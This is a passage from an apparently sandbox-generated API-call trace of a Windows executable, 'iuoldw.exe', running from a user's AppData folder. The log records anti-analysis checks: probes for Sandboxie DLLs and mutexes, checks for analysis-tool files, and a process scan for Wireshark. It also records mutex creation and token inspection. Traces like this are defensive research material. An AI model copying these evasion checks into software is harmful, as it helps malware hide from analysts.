dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0082.945] GlobalMemoryStatusEx (in: lpBuffer=0x18fe60 | out: lpBuffer=0x18fe60) returned 1 [0082.946] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18fe38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18fe38*=0x705ba84c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0082.946] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff68 | out: Wow64Process=0x18ff68) returned 1 [0082.946] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x4177f0, dwRevision=0x1 | out: pSecurityDescriptor=0x4177f0) returned 1 [0082.946] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0x4177f0, bDaclPresent=1, pDacl=0x0, bDaclDefaulted=0 | out: pSecurityDescriptor=0x4177f0) returned 1 [0082.946] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0082.947] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x57c830, lpbSaclPresent=0x18f4e0, pSacl=0x18f4e8, lpbSaclDefaulted=0x18f4e4 | out: lpbSaclPresent=0x18f4e0, pSacl=0x18f4e8, lpbSaclDefaulted=0x18f4e4) returned 1 [0082.947] SetSecurityDescriptorSacl (in: pSecurityDescriptor=0x4177f0, bSaclPresent=1, pSacl=0x57c844, bSaclDefaulted=0 | out: pSecurityDescriptor=0x4177f0) returned 1 [0082.947] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x18f220 | out: pszPath="C:\\Windows") returned 0x0 [0082.951] PathAddBackslashW (in: pszPath="C:\\Windows" | out: pszPath="C:\\Windows\\") returned="" [0082.951] GetVolumeNameForVolumeMountPointW (in: lpszVolumeMountPoint="C:\\Windows\\", lpszVolumeName=0x18f428, cchBufferLength=0x64 | out: lpszVolumeName="") returned 0 [0082.952] PathRemoveBackslashW (in: pszPath="C:\\Windows\\" | out: pszPath="C:\\Windows") returned="" [0082.952] PathRemoveFileSpecW (in: pszPath="C:\\Windows" | out: pszPath="C:\\") returned 1 [0082.952] PathAddBackslashW (in: pszPath="C:\\" | out: pszPath="C:\\") returned="" [0082.952] GetVolumeNameForVolumeMountPointW (in: lpszVolumeMountPoint="C:\\", lpszVolumeName=0x18f428, cchBufferLength=0x64 | out: lpszVolumeName="\\\\?\\Volume{bb11c9c2-5dad-11e7-a275-806e6f6e6963}\\") returned 1 [0082.952] CLSIDFromString (in: lpsz="{bb11c9c2-5dad-11e7-a275-806e6f6e6963}", pclsid=0x417a28 | out: pclsid=0x417a28*(Data1=0xbb11c9c2, Data2=0x5dad, Data3=0x11e7, Data4=([0]=0xa2, [1]=0x75, [2]=0x80, [3]=0x6e, [4]=0x6f, [5]=0x6e, [6]=0x69, [7]=0x63))) returned 0x0 [0082.953] GetVersionExW (in: lpVersionInformation=0x18f3d4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x772a3472, dwMinorVersion=0x0, dwBuildNumber=0x5857e8, dwPlatformId=0x0, szCSDVersion="ⴼ疠ⴼ疠") | out: lpVersionInformation=0x18f3d4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0082.953] GetVersionExW (in: lpVersionInformation=0x18f3c0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x18f478, dwMinorVersion=0x407dfd, dwBuildNumber=0x6, dwPlatformId=0x0, szCSDVersion="Ĝ") | out: lpVersionInformation=0x18f3c0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0082.953] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20008, TokenHandle=0x18f4ec | out: TokenHandle=0x18f4ec*=0x13c) returned 1 [0082.953] GetTokenInformation (in: TokenHandle=0x13c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18f4e8 | out: TokenInformation=0x0, ReturnLength=0x18f4e8) returned 0 [0082.953] GetLastError () returned 0x7a [0082.953] GetTokenInformation (in: TokenHandle=0x13c, TokenInformationClass=0x19, TokenInformation=0x1e8f9b0, TokenInformationLength=0x14, ReturnLength=0x18f4e8 | out: TokenInformation=0x1e8f9b0, ReturnLength=0x18f4e8) returned 1 [0082.953] GetSidSubAuthorityCount (pSid=0x1e8f9b8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x1e8f9b9 [0082.953] GetSidSubAuthority (pSid=0x1e8f9b8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x1e8f9c0 [0082.953] CloseHandle (hObject=0x13c) returned 1 [0082.953] CreateEventW (lpEventAttributes=0x4177e4, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x13c [0082.953] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18ff64 | out: TokenHandle=0x18ff64*=0x140) returned 1 [0082.953] GetTokenInformation (in: TokenHandle=0x140, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18ff4c | out: TokenInformation=0x0, ReturnLength=0x18ff4c) returned 0 [0082.953] GetLastError () returned 0x7a [0082.953] GetTokenInformation (in: TokenHandle=0x140, TokenInformationClass=0x1, TokenInformation=0x1e8f9b0, TokenInformationLength=0x24, ReturnLength=0x18ff4c | out: TokenInformation=0x1e8f9b0, ReturnLength=0x18ff4c) returned 1 [0082.953] GetTokenInformation (in: TokenHandle=0x140, TokenInformationClass=0xc, TokenInformation=0x4177e0, TokenInformationLength=0x4, ReturnLength=0x18ff60 | out: TokenInformation=0x4177e0, ReturnLength=0x18ff60) returned 1 [0082.953] CloseHandle (hObject=0x140) returned 1 [0082.953] GetLengthSid (pSid=0x1e8f9b8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0082.953] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x417810 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0x0 [0082.954] PathRemoveBackslashW (in: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming" | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned="g" [0082.954] GetCurrentProcess () returned 0xffffffff [0082.954] GetModuleFileNameExW (in: hProcess=0xffffffff, hModule=0x0, lpFilename=0x18fd64, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\iuoldw.exe")) returned 0x2c [0082.955] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77270000 [0082.955] GetProcAddress (hModule=0x77270000, lpProcName="RtlDosPathNameToNtPathName_U") returned 0x772cce41 [0082.955] GetProcAddress (hModule=0x77270000, lpProcName="NtCreateFile") returned 0x772900a4 [0082.955] GetProcAddress (hModule=0x77270000, lpProcName="NtClose") returned 0x7728f9d0 [0082.955] GetProcAddress (hModule=0x77270000, lpProcName="NtQueryEaFile") returned 0x77291314 [0082.955] GetProcAddress (hModule=0x77270000, lpProcName="NtSetEaFile") returned 0x772919b0 [0082.955] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe", NtPathName=0x18f880, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0082.955] NtCreateFile (in: FileHandle=0x18f874, DesiredAccess=0x8, ObjectAttributes=0x18f888*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x18f878, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x40, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x18f874*=0x14c, IoStatusBlock=0x18f878*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0082.955] NtQueryEaFile (in: FileHandle=0x14c, IoStatusBlock=0x18f878, Buffer=0x1e8fa80, Length=0x409, ReturnSingleEntry=1, EaList=0x0, EaListLength=0x0, EaIndex=0x0, RestartScan=0 | out: IoStatusBlock=0x18f878, Buffer=0x1e8fa80) returned 0xc0000052 [0082.955] NtClose (Handle=0x14c) returned 0x0 [0082.956] wvnsprintfW (in: pszDest=0x18f5f0, cchDest=3, pszFmt="%02X", arglist=0x18f5cc | out: pszDest="9B") returned 2 [0082.957] wvnsprintfW (in: pszDest=0x18f5f0, cchDest=3, pszFmt="%02X", arglist=0x18f5cc | out: pszDest="4D") returned 2 [0082.957] wvnsprintfW (in: pszDest=0x18f5f0, cchDest=3, pszFmt="%02X", arglist=0x18f5cc | out: pszDest="68") returned 2 [0082.957] wvnsprintfW (in: pszDest=0x18f5f0, cchDest=3, pszFmt="%02X", arglist=0x18f5cc | out: pszDest="96") returned 2 [0082.957] wvnsprintfW (in: pszDest=0x18f5f0, cchDest=3, pszFmt="%02X", arglist=0x18f5cc | out: pszDest="17") returned 2 [0082.957] wvnsprintfW (in: pszDest=0x18f5f0, cchDest=3, pszFmt="%02X", arglist=0x18f5cc | out: pszDest="31") returned 2 [0082.957] wvnsprintfW (in: pszDest=0x18f5f0, cchDest=3, pszFmt="%02X", arglist=0x18f5cc | out: pszDest="FE") returned 2 [0082.957] wvnsprintfW (in: pszDest=0x18f5f0, cchDest=3, pszFmt="%02X", arglist=0x18f5cc | out: pszDest="3C") returned 2 [0082.957] wvnsprintfW (in: pszDest=0x18f5f0, cchDest=3, pszFmt="%02X", arglist=0x18f5cc | out: pszDest="22") returned 2 [0082.957] wvnsprintfW (in: pszDest=0x18f5f0, cchDest=3, pszFmt="%02X", arglist=0x18f5cc | out: pszDest="DA") returned 2 [0082.957] wvnsprintfW (in: pszDest=0x18f5f0, cchDest=3, pszFmt="%02X", arglist=0x18f5cc | out: pszDest="08") returned 2 [0082.957] wvnsprintfW (in: pszDest=0x18f5f0, cchDest=3, pszFmt="%02X", arglist=0x18f5cc | out: pszDest="B6") returned 2 [0082.957] wvnsprintfW (in: pszDest=0x18f5f0, cchDest=3, pszFmt="%02X", arglist=0x18f5cc | out: pszDest="40") returned 2 [0082.957] wvnsprintfW (in: pszDest=0x18f5f0, cchDest=3, pszFmt="%02X", arglist=0x18f5cc | out: pszDest="79") returned 2 [0082.957] wvnsprintfW (in: pszDest=0x18f5f0, cchDest=3, pszFmt="%02X", arglist=0x18f5cc | out: pszDest="9E") returned 2 [0082.957] wvnsprintfW (in: pszDest=0x18f5f0, cchDest=3, pszFmt="%02X", arglist=0x18f5cc | out: pszDest="B6") returned 2 [0082.957] CreateMutexW (lpMutexAttributes=0x4177e4, bInitialOwner=0, lpName="9B4D68961731FE3C22DA08B640799EB6") returned 0x14c [0082.957] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0082.957] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="E5") returned 2 [0082.957] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="8E") returned 2 [0082.957] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="FF") returned 2 [0082.957] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="54") returned 2 [0082.957] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="09") returned 2 [0082.957] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="68") returned 2 [0082.957] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="A4") returned 2 [0082.957] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="36") returned 2 [0082.957] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="E9") returned 2 [0082.957] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="82") returned 2 [0082.957] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="FC") returned 2 [0082.957] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="FA") returned 2 [0082.957] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="1C") returned 2 [0082.957] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="04") returned 2 [0082.957] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="45") returned 2 [0082.957] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="A2") returned 2 [0082.957] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="E58EFF540968A436E982FCFA1C0445A2") returned 0x0 [0082.957] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="E58EFF540968A436E982FCFA1C0445A2") returned 0x0 [0082.957] GetCurrentProcess () returned 0xffffffff [0082.957] GetModuleFileNameExW (in: hProcess=0xffffffff, hModule=0x0, lpFilename=0x18f658, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\iuoldw.exe")) returned 0x2c [0082.957] PathRenameExtensionW (in: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe", pszExt=".dbg" | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.dbg") returned 1 [0082.957] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.dbg") returned 0 [0082.958] GetKeyboardLayoutList (in: nBuff=0, lpList=0x0 | out: lpList=0x0) returned 1 [0082.958] GetKeyboardLayoutList (in: nBuff=1, lpList=0x1e8fad0 | out: lpList=0x1e8fad0) returned 1 [0082.958] CreateFileW (lpFileName="C:\\popupkiller.exe" (normalized: "c:\\popupkiller.exe"), dwDesiredAccess=0x0, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0082.958] GetLastError () returned 0x2 [0082.958] CreateFileW (lpFileName="C:\\stimulator.exe" (normalized: "c:\\stimulator.exe"), dwDesiredAccess=0x0, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0082.958] GetLastError () returned 0x2 [0082.958] CreateFileW (lpFileName="C:\\TOOLS\\execute.exe" (normalized: "c:\\tools\\execute.exe"), dwDesiredAccess=0x0, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0082.958] GetLastError () returned 0x3 [0082.958] LoadLibraryW (lpLibFileName="SbieDll.dll") returned 0x0 [0082.961] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Sandboxie_SingleInstanceMutex_Control") returned 0x148 [0082.961] GetLastError () returned 0x0 [0082.961] CloseHandle (hObject=0x148) returned 1 [0082.961] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Frz_State") returned 0x148 [0082.961] GetLastError () returned 0x0 [0082.961] CloseHandle (hObject=0x148) returned 1 [0082.964] CreateFileW (lpFileName="\\\\.\\NPF_NdisWanIp" (normalized: "npf_ndiswanip"), dwDesiredAccess=0x0, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0082.965] GetLastError () returned 0x2 [0082.965] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x148 [0082.967] Process32FirstW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0082.967] StrStrIW (lpFirst="[System Process]", lpSrch="wireshark") returned 0x0 [0082.967] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0082.968] StrStrIW (lpFirst="System", lpSrch="wireshark") returned 0x0 [0082.968] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0082.968] StrStrIW (lpFirst="smss.exe", lpSrch="wireshark") returned 0x0 [0082.968] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0082.969] StrStrIW (lpFirst="csrss.exe", lpSrch="wireshark") returned 0x0 [0082.969] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0082.969] StrStrIW (lpFirst="wininit.exe", lpSrch="wireshark") returned 0x0 [0082.969] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0082.969] StrStrIW (lpFirst="csrss.exe", lpSrch="wireshark") returned 0x0 [0082.969] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0082.970] StrStrIW (lpFirst="winlogon.exe", lpSrch="wireshark") returned 0x0 [0082.970] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0082.970] StrStrIW (lpFirst="services.exe", lpSrch="wireshark") returned 0x0 [0082.970] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0082.971] StrStrIW (lpFirst="lsass.exe", lpSrch="wireshark") returned 0x0 [0082.971] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0082.971] StrStrIW (lpFirst="lsm.exe", lpSrch="wireshark") returned 0x0 [0082.971] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0082.971] StrStrIW (lpFirst="svchost.exe", lpSrch="wireshark") returned 0x0 [0082.971] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0082.972] StrStrIW (lpFirst="svchost.exe", lpSrch="wireshark") returned 0x0 [0082.972] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0082.972] StrStrIW (lpFirst="svchost.exe", lpSrch="wireshark") returned 0x0 [0082.972] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0082.973] StrStrIW (lpFirst="svchost.exe", lpSrch="wireshark") returned 0x0 [0082.973] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x35c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0082.973] StrStrIW (lpFirst="svchost.exe", lpSrch="wireshark") returned 0x0 [0082.973] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0082.973] StrStrIW (lpFirst="audiodg.exe", lpSrch="wireshark") returned 0x0 [0082.973] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0082.974] StrStrIW (lpFirst="svchost.exe", lpSrch="wireshark") returned 0x0 [0082.974] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0082.974] StrStrIW (lpFirst="svchost.exe", lpSrch="wireshark") returned 0x0 [0082.974] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x160, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0082.975] StrStrIW (lpFirst="spoolsv.exe", lpSrch="wireshark") returned 0x0 [0082.975] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x418, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0082.975] StrStrIW (lpFirst="svchost.exe", lpSrch="wireshark") returned 0x0 [0082.975] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0082.975] StrStrIW (lpFirst="OfficeClickToRun.exe", lpSrch="wireshark") returned 0x0 [0082.975] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0082.976] StrStrIW (lpFirst="taskhost.exe", lpSrch="wireshark") returned 0x0 [0082.976] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x314, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0082.976] StrStrIW (lpFirst="dwm.exe", lpSrch="wireshark") returned 0x0 [0082.976] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x544, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0082.977] StrStrIW (lpFirst="explorer.exe", lpSrch="wireshark") returned 0x0 [0082.977] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x600, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x35c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0082.977] StrStrIW (lpFirst="taskeng.exe", lpSrch="wireshark") returned 0x0 [0082.977] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x35c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0082.977] StrStrIW (lpFirst="taskeng.exe", lpSrch="wireshark") returned 0x0 [0082.977] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0082.978] StrStrIW (lpFirst="ONENOTEM.EXE", lpSrch="wireshark") returned 0x0 [0082.978] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x258, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0082.978] StrStrIW 